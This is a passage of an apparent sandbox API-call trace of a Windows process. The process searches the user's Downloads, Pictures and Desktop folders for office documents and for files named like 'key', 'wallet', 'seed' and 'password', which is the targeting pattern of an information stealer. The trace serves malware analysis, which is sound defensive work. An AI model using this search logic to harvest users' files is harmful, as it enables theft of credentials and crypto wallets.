lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.050] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.051] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.051] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Download", lpFilePart=0x0) returned 0x1b [0217.051] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\*.doc*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.051] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.052] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.052] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Download", lpFilePart=0x0) returned 0x1b [0217.053] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\*key*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.053] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.054] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.054] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Download", lpFilePart=0x0) returned 0x1b [0217.054] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\*wallet*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.054] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.055] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.056] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Download", lpFilePart=0x0) returned 0x1b [0217.056] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Download\\*seed*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.056] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.057] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0217.057] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%\\\\Pictures", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\\\Pictures") returned 0x1d [0217.057] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.057] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures", lpFilePart=0x0) returned 0x1b [0217.058] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\*.pdf", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.058] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.058] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1e0) returned 1 [0217.058] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.058] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures", lpFilePart=0x0) returned 0x1b [0217.058] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\*.docx", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.059] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.059] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1e0) returned 1 [0217.059] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.059] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures", lpFilePart=0x0) returned 0x1b [0217.059] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\*.xls", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.059] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.059] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1e0) returned 1 [0217.059] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.059] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures", lpFilePart=0x0) returned 0x1b [0217.061] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\*.xlsx", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.061] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.061] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1e0) returned 1 [0217.061] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.061] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures", lpFilePart=0x0) returned 0x1b [0217.061] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\*.txt", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.061] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.062] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1e0) returned 1 [0217.062] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.062] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures", lpFilePart=0x0) returned 0x1b [0217.062] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\*.doc*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.062] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.062] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1e0) returned 1 [0217.062] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.062] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures", lpFilePart=0x0) returned 0x1b [0217.062] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\*key*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.063] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.063] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1e0) returned 1 [0217.063] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.063] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures", lpFilePart=0x0) returned 0x1b [0217.063] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\*wallet*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.063] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.063] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1e0) returned 1 [0217.063] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.063] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures", lpFilePart=0x0) returned 0x1b [0217.063] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\*seed*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.064] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.064] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f1e0) returned 1 [0217.064] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0217.064] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%\\\\Desktop\\\\extras", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\\\Desktop\\\\extras") returned 0x24 [0217.064] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.064] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\extras", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\extras", lpFilePart=0x0) returned 0x21 [0217.064] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\extras\\*.pdf", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.064] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.066] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.066] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\extras", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\extras", lpFilePart=0x0) returned 0x21 [0217.066] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\extras\\*.docx", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.066] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.115] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.115] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\extras", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\extras", lpFilePart=0x0) returned 0x21 [0217.115] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\extras\\*.xls", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.115] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.117] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.117] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\extras", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\extras", lpFilePart=0x0) returned 0x21 [0217.117] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\extras\\*.xlsx", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.117] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.119] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.119] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\extras", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\extras", lpFilePart=0x0) returned 0x21 [0217.119] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\extras\\*.txt", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.119] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.121] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.121] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\extras", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\extras", lpFilePart=0x0) returned 0x21 [0217.121] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\extras\\*.doc*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.121] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.123] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.123] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\extras", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\extras", lpFilePart=0x0) returned 0x21 [0217.123] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\extras\\*key*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.123] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.125] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.125] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\extras", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\extras", lpFilePart=0x0) returned 0x21 [0217.125] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\extras\\*wallet*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.125] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.126] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.126] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\extras", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\extras", lpFilePart=0x0) returned 0x21 [0217.127] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\extras\\*seed*", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.127] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.129] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0217.129] ExpandEnvironmentStringsW (in: lpSrc="%userprofile%\\\\Desktop\\\\password", lpDst=0x36f16c, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\\\Desktop\\\\password") returned 0x26 [0217.129] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.129] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\password", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\password", lpFilePart=0x0) returned 0x23 [0217.130] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\password\\*.pdf", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.130] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.131] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.131] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\password", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\password", lpFilePart=0x0) returned 0x23 [0217.131] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\password\\*.docx", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.133] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.133] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\password", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\password", lpFilePart=0x0) returned 0x23 [0217.133] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\password\\*.xls", lpFindFileData=0x36efc0 | out: lpFindFileData=0x36efc0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0217.133] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef80) returned 1 [0217.135] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f210) returned 1 [0217.135] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\password", nBufferLength=0x105, lpBuffer=0x36ecf0, lpFilePart=0x0 | out: 